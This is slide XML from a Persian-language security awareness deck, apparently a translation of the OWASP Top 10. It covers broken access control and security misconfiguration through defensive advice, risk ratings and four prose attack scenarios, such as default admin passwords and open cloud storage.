                <a:spcPts val="2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محدود کردن سرعت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و دسترسی کنترل کننده برای به حداقل رساندن آسیب از ابزار حمله خودکار.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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بعد از خروج توکن های</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>JWT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>باید بر روی سرور نامعتبر شود</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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توسعه دهندگان و کارکنان </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>QA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>باید کنترل دسترسی عملکردی و تست های یکپارچه سازیرا در نظر بگیرند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="fa-IR" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنترل دسترسی ناقص</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="891548380"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۳</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۲</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۲</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۳</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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بهره برداری از کنترل دسترسی یک مهارت اصلی مهاجمان است. ابزارهای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>SAST </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>DAST </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>می توانند فقدان کنترل دسترسی را تشخیص دهند، اما</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> در صورت وجود کنترل دسترسی نمی توانند عملکرد آن را تایید کنند. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>کنترل دسترسی با استفاده از ابزار دستی و یا احتمالا از طریق خودکارسازی برای عدم وجود کنترل دسترسی در چارچوب های خاص قابل شناسایی است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ضعف های کنترل دسترسی عموما به علت عدم تشخیص خودکار و عدم تست عملکردی موثر توسط توسعه دهندگان نرم افزار وجود دارند.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تشخیص کنترل دسترسی به طور معمول نمی تواند به آزمایش خودکار ایستا یا پویا متوسل شود. تست دستی بهترین روش برای شناسایی کنترل دسترسی ناکارا</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>یا نبود کنترل دسترسی است، از جمله روش </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>GET vs PUT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>)، کنترل کننده، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>direct object references</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> سو غیره</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تأثیر فنی این</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> حمله بدین گونه است که </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> مهاجمان به عنوان کاربران یا مدیران، یا کاربران با استفاده از توابع اصلب، و یا ایجاد، دسترسی، به روز رسانی و یا حذف هر رکورد عمل</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> می کنند .</a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تاثیر کسب و کار بستگی به نیازهای حفاظت از برنامه و داده ها دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سرور برنامه همراه با برنامه های نمونه به طور خودکار نصب شده و حذف نشده است. این برنامه های نمونه دارای نقص امنیتی هستند که مهاجمان از سرور برای به خطر انداختن امنیت استفاده می کنند. اگر یکی از این برنامه ها کنسول مدیریت باشد، و حسابهای پیشفرض تغییری نداشته است، مهاجم با گذرواژه‌های پیشفرض وارد سیستم می‌شود و آن را تصرف می‌کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>لیست دایرکتوری در سرور غیر فعال نیست. مهاجم می توانند به سادگی از دایرکتوری ها برای یافتن فایل ها استفاده کند. مهاجم کلاس های جاوا کامپایل شده را پیدا می کند و آنها را دانلود می کند و آنها را تجزیه و تحلیل می کند و برای بازبینی این کد از مهندس معکوس استفاده می کنند. مهاجم پس از آن یک نقص کنترل دسترسی کنترل در برنامه کاربردی پیدا می کند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیکربندی سرور برنامه اجازه می دهد تا جزییات پیام های خطای، مثلا ردیابی پشته ها، به کاربران بازگردانده شود. این به طور بالقوه نشت اطلاعات حساس و یا نقص های زیر را شامل می شود مانند نسخه های اجزاء که شناخته شده اند آسیب پذیر هستند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ارائه دهنده خدمات ابری دارای مجوزهای به اشتراک گذاری پیش فرض برای سایر کاربران </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به اینترنت است. که منجر به دسترسی اطلاعات حساس ذخیره شده در ذخیره سازی ابر می گردد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
